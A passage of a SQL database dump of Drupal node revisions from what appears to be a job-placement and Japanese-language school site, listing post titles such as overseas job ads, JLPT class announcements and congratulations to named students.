(18, 338, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(10, 339, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 339, 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1692254623, 0, 0, 0, NULL, 'en', 0),
(10, 339, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(5, 340, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 340, 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692254677, 0, 0, 0, NULL, 'en', 0),
(5, 340, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(18, 357, 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 357, 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692280481, 0, 0, 0, NULL, 'en', 0),
(18, 357, 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(10, 358, 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 358, 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1692280580, 0, 0, 0, NULL, 'en', 0),
(10, 358, 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(5, 359, 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 359, 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692280669, 0, 0, 0, NULL, 'en', 0),
(5, 359, 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(62, 378, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940476, 0, 0, 1, 1, 'und', 0),
(62, 382, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940641, 0, 0, 1, NULL, 'und', 0),
(62, 383, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940670, 0, 0, 1, 1, 'und', 0),
(62, 392, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692941453, 0, 0, 0, 1, 'ja', 0),
(62, 392, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940670, 0, 0, 1, NULL, 'und', 0),
(62, 395, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692941584, 0, 0, 0, 1, 'ja', 0),
(62, 395, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940670, 0, 0, 1, NULL, 'und', 0),
(62, 396, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692941971, 0, 0, 0, 1, 'ja', 0),
(62, 396, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940670, 0, 0, 1, NULL, 'und', 0),
(62, 397, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692942279, 0, 0, 0, 1, 'ja', 0),
(62, 397, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692940670, 0, 0, 1, NULL, 'und', 0),
(62, 398, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692942279, 0, 0, 0, NULL, 'ja', 0),
(62, 398, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692942680, 0, 0, 1, 1, 'und', 0),
(62, 399, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692942279, 0, 0, 0, NULL, 'ja', 0),
(62, 399, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692947061, 0, 0, 1, 1, 'und', 0),
(62, 400, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692942279, 0, 0, 0, NULL, 'ja', 0),
(62, 400, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692947360, 0, 0, 1, 1, 'und', 0),
(62, 401, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692947406, 0, 0, 0, 1, 'ja', 0),
(62, 401, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692947360, 0, 0, 1, NULL, 'und', 0),
(62, 402, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692947515, 0, 0, 0, 1, 'ja', 0),
(62, 402, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692947360, 0, 0, 1, NULL, 'und', 0),
(62, 403, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692947515, 0, 0, 0, NULL, 'ja', 0),
(62, 403, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692947683, 0, 0, 1, 1, 'und', 0),
(62, 404, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692947515, 0, 0, 0, NULL, 'ja', 0),
(62, 404, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692952315, 0, 0, 1, 1, 'und', 0),
(62, 405, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1692952380, 0, 0, 0, 1, 'ja', 0),
(62, 405, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692952315, 0, 0, 1, NULL, 'und', 0),
(62, 406, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1693194221, 0, 0, 0, 1, 'ja', 0),
(62, 406, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692952315, 0, 0, 1, NULL, 'und', 0),
(62, 407, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1693194347, 0, 0, 0, 1, 'ja', 0),
(62, 407, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1692952315, 0, 0, 1, NULL, 'und', 0),
(62, 408, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1693194347, 0, 0, 0, NULL, 'ja', 0),
(62, 408, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1693194414, 0, 0, 1, 1, 'und', 0),
(62, 409, 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1693194347, 0, 0, 0, NULL, 'ja', 0),
(62, 409, 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1693194768, 0, 0, 1, 1, 'und', 0),
(24, 411, 'en', 1, 2, 'Our Services', 1688384288, 1692069461, 0, 0, 1, NULL, 'und', 0),
(24, 411, 'ja', 1, 2, '事業内容', 1688384311, 1693623429, 0, 0, 0, 1, 'en', 0),
(24, 411, 'ko', 1, 2, '회사 서비스', 1688432702, 1692069414, 0, 0, 0, NULL, 'en', 0),
(24, 412, 'en', 1, 2, 'Our Services', 1688384288, 1693623453, 0, 0, 1, 1, 'und', 0),
(24, 412, 'ja', 1, 2, '事業内容', 1688384311, 1693623429, 0, 0, 0, NULL, 'en', 0),
(24, 412, 'ko', 1, 2, '회사 서비스', 1688432702, 1692069414, 0, 0, 0, NULL, 'en', 0),
(24, 413, 'en', 1, 2, 'Our Services', 1688384288, 1693623453, 0, 0, 1, NULL, 'und', 0),
(24, 413, 'ja', 1, 2, '事業内容', 1688384311, 1693623429, 0, 0, 0, NULL, 'en', 0),
(24, 413, 'ko', 1, 2, '회사 서비스', 1688432702, 1693623472, 0, 0, 0, 1, 'en', 0),
(66, 418, 'en', 1, 1, ' Exciting News for Japanese Language Enthusiasts! ', 1707206497, 1707206926, 0, 0, 1, 1, 'und', 0),
(67, 419, 'ja', 1, 1, 'Wishing Everyone a Happy New Day! ', 1707209784, 1707212568, 0, 0, 1, 1, 'und', 0),
(66, 420, 'en', 1, 1, ' Exciting News for Japanese Language Enthusiasts! ', 1707206497, 1713156227, 0, 0, 1, 1, 'und', 0),
(67, 421, 'ja', 1, 1, 'Wishing Everyone a Happy New Day! ', 1707209784, 1713156247, 0, 0, 1, 1, 'und', 0),
(68, 422, 'en', 1, 1, 'Congratulations (22-4-2024)', 1719289801, 1719290854, 0, 0, 1, 1, 'und', 0),
(68, 423, 'en', 1, 1, 'Congratulations (22-4-2024)', 1719289801, 1719290854, 0, 0, 1, NULL, 'und', 0),
(68, 423, 'ja', 1, 1, 'Congratulations (22-4-2024)', 1719290898, 1719291143, 0, 0, 0, 1, 'en', 0),
(68, 424, 'en', 1, 1, 'Congratulations (22-4-2024)', 1719289801, 1719291332, 0, 0, 1, 1, 'und', 0),
(68, 424, 'ja', 1, 1, 'Congratulations (22-4-2024)', 1719290898, 1719291143, 0, 0, 0, 1, 'en', 0),
(69, 425, 'ja', 1, 1, 'Congratulations (9-4-2024)', 1719291375, 1719292191, 0, 0, 1, 1, 'und', 0),
(69, 426, 'en', 1, 1, 'Congratulations (9-4-2024)', 1719292222, 1719292567, 0, 0, 0, 1, 'ja', 0),
(69, 426, 'ja', 1, 1, 'Congratulations (9-4-2024)', 1719291375, 1719292191, 0, 0, 1, NULL, 'und', 0),
(70, 427, 'en', 1, 1, 'Congrats ', 1719295125, 1719296098, 0, 0, 1, 1, 'und', 0),
(71, 428, 'en', 1, 1, 'Congratulations!!', 1719295190, 1719296146, 0, 0, 1, 1, 'und', 0),
(71, 429, 'en', 1, 1, 'Congratulations!!', 1719295190, 1719296385, 0, 0, 1, 1, 'und', 0),
(70, 430, 'en', 1, 1, 'Congrats ', 1719295125, 1719296098, 0, 0, 1, NULL, 'und', 0),
(70, 430, 'ja', 1, 1, 'Congrats ', 1719296133, 1719296559, 0, 0, 0, 1, 'en', 0),
(71, 431, 'en', 1, 1, 'Congratulations!!', 1719295190, 1719296385, 0, 0, 1, NULL, 'und', 0),
(71, 431, 'ja', 1, 1, 'Congratulations!!', 1719296400, 1719296751, 0, 0, 0, 1, 'en', 0),
(72, 432, 'en', 1, 1, 'Congratulations!!', 1719296820, 1719297437, 0, 0, 1, 1, 'und', 0),
(72, 433, 'en', 1, 1, 'Congratulations!!', 1719296820, 1719297515, 0, 0, 1, 1, 'und', 0),
(72, 434, 'en', 1, 1, 'Congratulations!!', 1719296820, 1719297635, 0, 0, 1, 1, 'und', 0),
(72, 435, 'en', 1, 1, 'Congratulations!!', 1719296820, 1719297635, 0, 0, 1, NULL, 'und', 0),
(72, 435, 'ja', 1, 1, 'Congratulations!!', 1719297648, 1719297741, 0, 0, 0, 1, 'en', 0),
(73, 436, 'en', 1, 1, 'Congratulations (19-5-2024)', 1719296913, 1719297947, 0, 0, 1, 1, 'und', 0),
(74, 437, 'en', 1, 1, 'Congratulations!!', 1719297778, 1719298045, 0, 0, 1, 1, 'und', 0);
INSERT INTO `node_field_revision` (`nid`, `vid`, `langcode`, `status`, `uid`, `title`, `created`, `changed`, `promote`, `sticky`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`) VALUES
(74, 438, 'en', 1, 1, 'Congratulations!!', 1719297778, 1719298045, 0, 0, 1, NULL, 'und', 0),
(74, 438, 'ja', 1, 1, 'Congratulations!!', 1719298217, 1719298434, 0, 0, 0, 1, 'en', 0),
(73, 439, 'en', 1, 1, 'Congratulations (19-5-2024)', 1719296913, 1719297947, 0, 0, 1, NULL, 'und', 0),
(73, 439, 'ja', 1, 1, 'Congratulations (19-5-2024)', 1719297960, 1719298494, 0, 0, 0, 1, 'en', 0),
(74, 440, 'en', 1, 1, 'Congratulations!!', 1719297778, 1719298533, 0, 0, 1, 1, 'und', 0),
(74, 440, 'ja', 1, 1, 'Congratulations!!', 1719298217, 1719298434, 0, 0, 0, NULL, 'en', 0),
(75, 441, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301473, 0, 0, 1, 1, 'und', 0),
(75, 442, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301473, 0, 0, 1, NULL, 'und', 0),
(75, 442, 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301670, 0, 0, 0, 1, 'en', 0),
(75, 443, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301473, 0, 0, 1, NULL, 'und', 0),
(75, 443, 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301811, 0, 0, 0, 1, 'en', 0),
(75, 444, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301473, 0, 0, 1, NULL, 'und', 0),
(75, 444, 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301861, 0, 0, 0, 1, 'en', 0),
(76, 445, 'en', 1, 1, 'Congratulations (19-5-2024)', 1719301438, 1719301871, 0, 0, 1, 1, 'und', 0),
(75, 446, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301916, 0, 0, 1, 1, 'und', 0),
(75, 446, 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301861, 0, 0, 0, NULL, 'en', 0),
(76, 447, 'en', 1, 1, 'Congratulations (19-5-2024)', 1719301438, 1719301871, 0, 0, 1, NULL, 'und', 0),
(76, 447, 'ja', 1, 1, 'Congratulations (19-5-2024)', 1719301884, 1719301957, 0, 0, 0, 1, 'en', 0),
(75, 448, 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301974, 0, 0, 1, 1, 'und', 0),
(75, 448, 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301861, 0, 0, 0, NULL, 'en', 0),
(77, 449, 'en', 1, 1, 'Congratulations (25-6-2024)', 1719302198, 1719305316, 0, 0, 1, 1, 'und', 0),
(77, 450, 'en', 1, 1, 'Congratulations (25-6-2024)', 1719302198, 1719305316, 0, 0, 1, NULL, 'und', 0),
(77, 450, 'ja', 1, 1, 'Congratulations (25-6-2024)', 1719305363, 1719305714, 0, 0, 0, 1, 'en', 0),
(78, 451, 'en', 1, 1, 'Congratulations ( 13-6-2024)', 1719306396, 1719306699, 0, 0, 1, 1, 'und', 0),
(78, 452, 'en', 1, 1, 'Congratulations ( 13-6-2024)', 1719306396, 1719306699, 0, 0, 1, NULL, 'und', 0),
(78, 452, 'ja', 1, 1, 'Congratulations ( 13-6-2024)', 1719306717, 1719306801, 0, 0, 0, 1, 'en', 0),
(79, 453, 'en', 1, 1, 'Congratulations (2-6-2024)', 1719307033, 1719308229, 0, 0, 1, 1, 'und', 0),
(80, 454, 'en', 1, 1, 'Congratulations (2-6-2024)', 1719308348, 1719309084, 0, 0, 1, 1, 'und', 0),
(80, 455, 'en', 1, 1, 'Congratulations (2-6-2024)', 1719308348, 1719309084, 0, 0, 1, NULL, 'und', 0),
(80, 455, 'ja', 1, 1, 'Congratulations (2-6-2024)', 1719309096, 1719309239, 0, 0, 0, 1, 'en', 0),
(81, 456, 'en', 1, 1, 'CONGRATULATIONS FOR PASSING INTERVIEW! KAUNG MYAT SOE! ', 1719309278, 1719309533, 0, 0, 1, 1, 'und', 0),
(81, 457, 'en', 1, 1, 'CONGRATULATIONS FOR PASSING INTERVIEW! KAUNG MYAT SOE! ', 1719309278, 1719309533, 0, 0, 1, NULL, 'und', 0),
(81, 457, 'ja', 1, 1, 'CONGRATULATIONS FOR PASSING INTERVIEW! KAUNG MYAT SOE! ', 1719309544, 1719309613, 0, 0, 0, 1, 'en', 0),
(82, 458, 'en', 1, 1, 'Congratulations to MYO KHANT!!', 1719301992, 1719311486, 0, 0, 1, 1, 'und', 0),
(82, 459, 'en', 1, 1, 'Congratulations to MYO KHANT!!', 1719301992, 1719311486, 0, 0, 1, NULL, 'und', 0),
(82, 459, 'ja', 1, 1, ' MYO KHANT、おめでとうございます！', 1719311528, 1719311707, 0, 0, 0, 1, 'en', 0),
(83, 460, 'en', 1, 1, 'Congratulation For Getting COE  ', 1719311392, 1719311899, 0, 0, 1, 1, 'und', 0),
(84, 461, 'en', 1, 1, 'Congratulations to YE MONG AUNG!!', 1719311720, 1719312126, 0, 0, 1, 1, 'und', 0),
(85, 462, 'en', 1, 1, 'CONGRATULATIONS TO PAING MYO ZAW ', 1719309679, 1719312138, 0, 0, 1, 1, 'und', 0),
(85, 463, 'en', 1, 1, 'CONGRATULATIONS TO PAING MYO ZAW ', 1719309679, 1719312138, 0, 0, 1, NULL, 'und', 0),
(85, 463, 'ja', 1, 1, 'CONGRATULATIONS TO PAING MYO ZAW ', 1719312166, 1719312207, 0, 0, 0, 1, 'en', 0),
(83, 464, 'en', 1, 1, 'Congratulation For Getting COE  ', 1719311392, 1719311899, 0, 0, 1, NULL, 'und', 0),
(83, 464, 'ja', 1, 1, 'Congratulation For Getting COE  ', 1719311918, 1719312245, 0, 0, 0, 1, 'en', 0),
(84, 465, 'en', 1, 1, 'Congratulations to YE MONG AUNG!!', 1719311720, 1719312126, 0, 0, 1, NULL, 'und', 0),
(84, 465, 'ja', 1, 1, 'YE MONG AUNG、おめでとうございます！', 1719312195, 1719312476, 0, 0, 0, 1, 'en', 0),
(86, 466, 'en', 1, 1, 'Congratulations For Getting COE ', 1719312257, 1719312687, 0, 0, 1, 1, 'und', 0),
(86, 467, 'en', 1, 1, 'Congratulations For Getting COE ', 1719312257, 1719312687, 0, 0, 1, NULL, 'und', 0),
(86, 467, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719312697, 1719312873, 0, 0, 0, 1, 'en', 0),
(87, 468, 'ja', 1, 1, 'Things to Beware while working in Japan', 1719312490, 1719313107, 0, 0, 1, 1, 'und', 0),
(87, 469, 'en', 1, 1, 'Things to Beware while working in Japan', 1719313142, 1719313146, 0, 0, 0, 1, 'ja', 0),
(87, 469, 'ja', 1, 1, 'Things to Beware while working in Japan', 1719312490, 1719313107, 0, 0, 1, NULL, 'und', 0),
(88, 470, 'en', 1, 1, 'Congratulation For Getting COE  ', 1719312967, 1719313150, 0, 0, 1, 1, 'und', 0),
(88, 471, 'en', 1, 1, 'Congratulation For Getting COE  ', 1719312967, 1719313150, 0, 0, 1, NULL, 'und', 0),
(88, 471, 'ja', 1, 1, 'Congratulation For Getting COE  ', 1719313161, 1719313203, 0, 0, 0, 1, 'en', 0),
(89, 472, 'en', 1, 1, 'Congratulations For Getting COE  ', 1719313210, 1719313467, 0, 0, 1, 1, 'und', 0),
(89, 473, 'en', 1, 1, 'Congratulations For Getting COE  ', 1719313210, 1719313467, 0, 0, 1, NULL, 'und', 0),
(89, 473, 'ja', 1, 1, 'Congratulations For Getting COE  ', 1719313471, 1719313506, 0, 0, 0, 1, 'en', 0),
(90, 474, 'en', 1, 1, 'Congratulations to Chaw Chit Kyaw!!', 1719312499, 1719313514, 0, 0, 1, 1, 'und', 0),
(90, 475, 'en', 1, 1, 'Congratulations to CHAW CHIT KYAW!!', 1719312499, 1719313640, 0, 0, 1, 1, 'und', 0),
(87, 476, 'en', 1, 1, 'Things to Beware while working in Japan', 1719313142, 1719313146, 0, 0, 0, NULL, 'ja', 0),
(87, 476, 'ja', 1, 1, 'Things to Beware while working in Japan', 1719312490, 1719313680, 0, 0, 1, 1, 'und', 0),
(90, 477, 'en', 1, 1, 'Congratulations to CHAW CHIT KYAW!!', 1719312499, 1719313640, 0, 0, 1, NULL, 'und', 0),
(90, 477, 'ja', 1, 1, 'CHAW CHIT KYAW、おめでとうございます！！', 1719313660, 1719313769, 0, 0, 0, 1, 'en', 0),
(90, 478, 'en', 1, 1, 'Congratulations to CHAW CHIT KYAW!!', 1719312499, 1719313640, 0, 0, 1, NULL, 'und', 0),
(90, 478, 'ja', 1, 1, 'CHAW CHIT KYAW、おめでとうございます！！', 1719313660, 1719313797, 0, 0, 0, 1, 'en', 0),
(91, 479, 'en', 1, 1, 'Congratulations For Getting COE ', 1719313625, 1719313857, 0, 0, 1, 1, 'und', 0),
(91, 480, 'en', 1, 1, 'Congratulations For Getting COE ', 1719313625, 1719313857, 0, 0, 1, NULL, 'und', 0),
(91, 480, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719313861, 1719313914, 0, 0, 0, 1, 'en', 0),
(92, 481, 'en', 1, 1, 'Congratulations For Getting COE ', 1719314017, 1719314184, 0, 0, 1, 1, 'und', 0),
(92, 482, 'en', 1, 1, 'Congratulations For Getting COE ', 1719314017, 1719314184, 0, 0, 1, NULL, 'und', 0),
(92, 482, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719314189, 1719314223, 0, 0, 0, 1, 'en', 0),
(93, 483, 'en', 1, 1, 'Congratulations For Getting COE おめでとう！  YA MIN THET さんと SHIN THANT PHYU さん、COE 取得おめでとうございます', 1719314427, 1719314643, 0, 0, 1, 1, 'und', 0),
(93, 484, 'en', 1, 1, 'Congratulations For Getting COE おめでとう！  YA MIN THET さんと SHIN THANT PHYU さん、COE 取得おめでとうございます', 1719314427, 1719314643, 0, 0, 1, NULL, 'und', 0),
(93, 484, 'ja', 1, 1, 'Congratulations For Getting COE ', 1719314648, 1719314714, 0, 0, 0, 1, 'en', 0),
(94, 485, 'en', 1, 1, 'Congratulations For Getting COE ', 1719314848, 1719315003, 0, 0, 1, 1, 'und', 0),
(95, 486, 'en', 1, 1, 'ACTIVITIES FOR 2ND BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719313690, 1719315576, 0, 0, 1, 1, 'und', 0),
(95, 487, 'en', 1, 1, 'ACTIVITIES FOR 2ND BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719313690, 1719315576, 0, 0, 1, NULL, 'und', 0),
(95, 487, 'ja', 1, 1, 'ACTIVITIES FOR 2ND BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719315595, 1719315692, 0, 0, 0, 1, 'en', 0),
(96, 488, 'en', 1, 1, 'Congralutations For Getting COE', 1719315520, 1719315929, 0, 0, 1, 1, 'und', 0),
(96, 489, 'en', 1, 1, 'Congralutations For Getting COE', 1719315520, 1719315929, 0, 0, 1, NULL, 'und', 0),
(96, 489, 'ja', 1, 1, 'Congralutations For Getting COE', 1719315935, 1719316010, 0, 0, 0, 1, 'en', 0),
(97, 490, 'en', 1, 1, 'Congralutations For Getting COE', 1719316075, 1719316438, 0, 0, 1, 1, 'und', 0),
(97, 491, 'en', 1, 1, 'Congralutations For Getting COE', 1719316075, 1719316438, 0, 0, 1, NULL, 'und', 0),
(97, 491, 'ja', 1, 1, 'Congralutations For Getting COE', 1719316506, 1719316533, 0, 0, 0, 1, 'en', 0),
(98, 492, 'en', 1, 1, '2nd batch Pratical Class for Restaurant', 1719316079, 1719316566, 0, 0, 1, 1, 'und', 0),
(98, 493, 'en', 1, 1, '2nd batch Pratical Class for Restaurant', 1719316079, 1719316566, 0, 0, 1, NULL, 'und', 0),
(98, 493, 'ja', 1, 1, '2nd batch Pratical Class for Restaurant', 1719316573, 1719316648, 0, 0, 0, 1, 'en', 0),
(99, 494, 'en', 1, 1, 'Congralutations For Getting COE', 1719316638, 1719316788, 0, 0, 1, 1, 'und', 0),
(99, 495, 'en', 1, 1, 'Congralutations For Getting COE', 1719316638, 1719316788, 0, 0, 1, NULL, 'und', 0),
(99, 495, 'ja', 1, 1, 'Congralutations For Getting COE', 1719316800, 1719316846, 0, 0, 0, 1, 'en', 0),
(100, 496, 'en', 1, 1, 'Congratulations to BO BO ZAW!', 1719383205, 1719383465, 0, 0, 1, 1, 'und', 0),
(100, 497, 'en', 1, 1, 'Congratulations to BO BO ZAW!', 1719383205, 1719383465, 0, 0, 1, NULL, 'und', 0),
(100, 497, 'ja', 1, 1, 'Congratulations to BO BO ZAW!', 1719383481, 1719386107, 0, 0, 0, 1, 'en', 0),
(101, 498, 'en', 1, 1, 'Congratulations for YAMIN PHYO!', 1719392698, 1719393267, 0, 0, 1, 1, 'und', 0),
(101, 499, 'en', 1, 1, 'Congratulations for YAMIN PHYO!', 1719392698, 1719393267, 0, 0, 1, NULL, 'und', 0),
(101, 499, 'ja', 1, 1, 'Congratulations for YAMIN PHYO!', 1719393285, 1719393363, 0, 0, 0, 1, 'en', 0),
(102, 500, 'en', 1, 1, 'Congrats THAE SU YATI SOE!', 1719393421, 1719393839, 0, 0, 1, 1, 'und', 0),
(102, 501, 'en', 1, 1, 'Congrats THAE SU YATI SOE!', 1719393421, 1719393839, 0, 0, 1, NULL, 'und', 0),
(102, 501, 'ja', 1, 1, 'Congrats THAE SU YATI SOE!', 1719393864, 1719394008, 0, 0, 0, 1, 'en', 0),
(103, 502, 'en', 1, 1, 'Congratulations For Getting COE ', 1719392034, 1719394260, 0, 0, 1, 1, 'und', 0),
(104, 503, 'en', 1, 1, 'Congratulations KHAING SAPAL OO!', 1719394044, 1719394273, 0, 0, 1, 1, 'und', 0),
(104, 504, 'en', 1, 1, 'Congratulations KHAING SAPAL OO!', 1719394044, 1719394273, 0, 0, 1, NULL, 'und', 0),
(104, 504, 'ja', 1, 1, 'Congratulations KHAING SAPAL OO!', 1719394283, 1719394347, 0, 0, 0, 1, 'en', 0),
(103, 505, 'en', 1, 1, 'Congratulations For Getting COE ', 1719392034, 1719394260, 0, 0, 1, NULL, 'und', 0),
